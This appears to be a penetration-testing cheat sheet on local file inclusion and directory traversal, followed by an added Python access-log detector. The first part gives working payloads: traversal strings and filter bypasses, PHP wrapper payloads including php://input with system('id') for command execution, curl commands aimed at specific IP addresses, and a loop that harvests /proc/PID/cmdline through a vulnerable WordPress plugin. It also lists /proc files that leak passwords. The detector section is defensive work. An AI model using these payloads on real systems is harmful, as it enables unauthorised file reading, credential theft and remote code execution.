# File Inclusion / Directory Traversal

[Hacktricks](https://book.hacktricks.xyz/pentesting-web/file-inclusion)

[PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion)

[Blog](https://www.netspi.com/blog/technical/web-application-penetration-testing/directory-traversal-file-inclusion-proc-file-system/): The Proc File System

[Tool: LFISuite](https://github.com/D35m0nd142/LFISuite), [second tool: fimap](https://github.com/kurobeats/fimap)

## LFI

```
file:///../../../etc/passwd
/etc/passwd on Linux or C:\Windows\boot.ini on Windows

# If input from parameters is used as part of a filename,
# we can bypass by adding /../ in the

# If blacklisting is not coded correctly (a single, non-recursive strip of "../"):
# ..././ and ....// become ../ once the inner "../" is removed, and vice versa
cat .?/.*/.?/etc/passwd
# Bash allows the ? and * wildcards to stand in for characters of the path

# On PHP versions 5.3.4 and earlier, string-based detection could be bypassed by URL-encoding the payload.
# The characters ../ can be URL-encoded as %2e%2e%2f, which bypasses the filter.
```

PHP provides various wrappers, which can be used for easier access to files, protocols, or streams. A list of wrappers can be found [here](https://www.php.net/manual/en/wrappers.php.php). The `php://` wrapper is enabled by default and interacts with IO streams.

### PHP filter to convert file contents to Base64

```
php://filter/read=convert.base64-encode/resource=/etc/passwd
# the filter returns the file Base64-encoded, so PHP source that would otherwise be executed by include() can be retrieved and decoded
curl http://134.209.184.216:32391/extension/index.php?language=php://filter/read=convert.base64-encode/resource=config
```

### PHP filter to convert file contents to ROT13

```
php://filter/read=string.rot13/resource=/etc/passwd
```

### Command execution with the PHP `Expect` wrapper

The `expect://` wrapper is not enabled by default; it requires the PECL `expect` extension, so it is only present where that extension has been installed.

```
expect://id
```

### Command execution with the PHP `Input` wrapper

```
curl -s -X POST --data "<?php system('id'); ?>" "http://134.209.184.216:30084/index.php?language=php://input"
```

### Command execution with the PHP `Zip` wrapper

```
zip://malicious.zip%23exec.php&cmd=id
```

## The Proc File System

Iterate over candidate PIDs and read each `/proc/[PID]/cmdline` through the vulnerable parameter; the `grep`/`sed` chain strips the echoed path and the surrounding HTML so only the command lines remain:

```
$ for i in `seq 1 10000`; do curl -s --output - http://$RHOST/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/$i/cmdline | grep -oaE 'cmdline.*?<script>' | sed "s/cmdline\/proc\/$i\/cmdline\/proc\/$i\/cmdline//" | sed "s/<script>//" | grep -avE '^$'; done
```

| Directory                       | Description                                                                                                                                                                                        |
| ------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| /proc/sched\_debug              | Usually enabled on newer systems, such as RHEL 6.  Shows which process is running on which CPU, which makes it a handy way to get a list of processes and their PIDs.                             |
| /proc/mounts                    | Provides a list of mounted file systems.  Can be used to determine where other interesting files might be located                                                                                  |
| /proc/net/arp                   | Shows the ARP table.  This is one way to find out IP addresses for other internal servers.                                                                                                         |
| /proc/net/route                 | Shows the routing table information.                                                                                                                                                               |
| /proc/net/tcp and /proc/net/udp | Provides a list of active connections.  Can be used to determine what ports are listening on the server                                                                                            |
| /proc/net/fib\_trie             | This is used for route caching.  This can also be used to determine local IPs, as well as gain a better understanding of the target’s networking structure                                         |
| /proc/version                   | Shows the kernel version.  This can be used to help determine the OS running and the last time it’s been fully updated.                                                                            |

| Directory            | Description                                                                                                                                                                           |
| -------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| /proc/\[PID]/cmdline | Lists everything that was used to invoke the process. This sometimes contains useful paths to configuration files as well as usernames and passwords.                                 |
| /proc/\[PID]/environ | Lists all the environment variables that were set when the process was invoked.  This also sometimes contains useful paths to configuration files as well as usernames and passwords. |
| /proc/\[PID]/cwd     | Points to the current working directory of the process.  This may be useful if you don’t know the absolute path to a configuration file.                                              |
| /proc/\[PID]/fd/\[#] | Provides access to the file descriptors being used.  In some cases this can be used to read files that are opened by a process.                                                       |
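Both the wrapper payloads in the sections above and the `/proc` enumeration loop leave a distinctive trail in the web server's access log. The following Python is an added detection example (not code from the original notes or the linked NetSPI post): it URL-decodes each request target, tags traversal sequences, stream wrappers and `/proc` reads, and reports any client that pulled `cmdline` for several distinct PIDs, which is the shape of the `seq` loop. The log lines are constructed samples in Apache combined format; the addresses, timestamps and the PID threshold are assumptions.

```python
"""Access-log triage for LFI indicators: traversal, PHP stream wrappers, /proc reads.

Added detection example, not from the original notes. The log lines below are
constructed samples in Apache combined format (RFC 5737 documentation IPs);
the PID-enumeration threshold is an assumption to tune per environment.
"""
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample traffic: one benign request, the wrapper and traversal forms
# from the notes, three sequential /proc/<pid>/cmdline reads, and two controls.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?language=en HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "GET /index.php?language=php://filter/read=convert.base64-encode/resource=config HTTP/1.1" 200 2048 "-" "curl/7.88.1"
203.0.113.7 - - [10/Oct/2023:13:55:38 +0000] "GET /index.php?language=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1337 "-" "curl/7.88.1"
203.0.113.7 - - [10/Oct/2023:13:55:39 +0000] "GET /index.php?language=....//....//etc/passwd HTTP/1.1" 200 1337 "-" "curl/7.88.1"
203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "POST /index.php?language=php://input HTTP/1.1" 200 90 "-" "curl/7.88.1"
203.0.113.7 - - [10/Oct/2023:13:55:41 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/1/cmdline HTTP/1.1" 200 44 "-" "curl/7.88.1"
203.0.113.7 - - [10/Oct/2023:13:55:41 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/2/cmdline HTTP/1.1" 200 12 "-" "curl/7.88.1"
203.0.113.7 - - [10/Oct/2023:13:55:41 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/3/cmdline HTTP/1.1" 200 12 "-" "curl/7.88.1"
198.51.100.2 - - [10/Oct/2023:13:56:00 +0000] "GET /docs/../about.html HTTP/1.1" 200 900 "-" "Mozilla/5.0"
198.51.100.2 - - [10/Oct/2023:13:56:01 +0000] "GET /search.php?q=wait...%20what HTTP/1.1" 200 700 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Two or more dots followed by a separator covers ../, ..\, ..././ and ....//.
# Browsers normalise dot segments before sending, so a raw '..' on the wire is itself unusual.
TRAVERSAL_RE = re.compile(r"\.{2,}[/\\]")
WRAPPER_RE = re.compile(r"\b(?:php|expect|zip|phar|data|file|glob)://")
PROC_RE = re.compile(
    r"/proc/(?:self|\d+)/(?:cmdline|environ|cwd|fd)|/proc/(?:net/|sched_debug|mounts|version)"
)
PROC_PID_RE = re.compile(r"/proc/(\d+)/")


def normalise(target: str) -> str:
    """URL-decode until stable (bounded), so %2e%2e%2f and double-encoded
    forms compare equal to their plain-text equivalents."""
    decoded = target
    for _ in range(3):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return decoded


def classify(target: str) -> list:
    """Return the indicator tags present in an already-normalised request target."""
    low = target.lower()
    tags = []
    if TRAVERSAL_RE.search(low):
        tags.append("traversal")
    if WRAPPER_RE.search(low):
        tags.append("wrapper")
    if PROC_RE.search(low):
        tags.append("proc")
    return tags


def analyse(log_text: str, pid_threshold: int = 3):
    """Tag each request and flag clients reading cmdline/environ for many PIDs.

    Returns (findings, enumerators): findings is a list of
    (ip, raw_target, tags) for every tagged line; enumerators is the set of
    client IPs that touched at least pid_threshold distinct /proc/<pid>/ entries.
    """
    findings = []
    pids_by_ip = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or non-combined-format line; skip rather than guess
        target = normalise(m["target"])
        tags = classify(target)
        pid = PROC_PID_RE.search(target)
        if pid:
            pids_by_ip[m["ip"]].add(pid.group(1))
        if tags:
            findings.append((m["ip"], m["target"], tags))
    enumerators = {ip for ip, pids in pids_by_ip.items() if len(pids) >= pid_threshold}
    return findings, enumerators


if __name__ == "__main__":
    hits, scanners = analyse(SAMPLE_LOG)
    for ip, target, tags in hits:
        print(f"{ip:<14} {','.join(tags):<18} {target}")
    print("PID enumeration from:", sorted(scanners) or "none")
```

The `/docs/../about.html` control is tagged on purpose: a raw `..` segment is rare from real browsers, so a low-volume traversal tag on its own is a triage prompt, while the PID-enumeration set is the higher-confidence signal because benign traffic has no reason to walk `/proc/<pid>/` sequentially.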
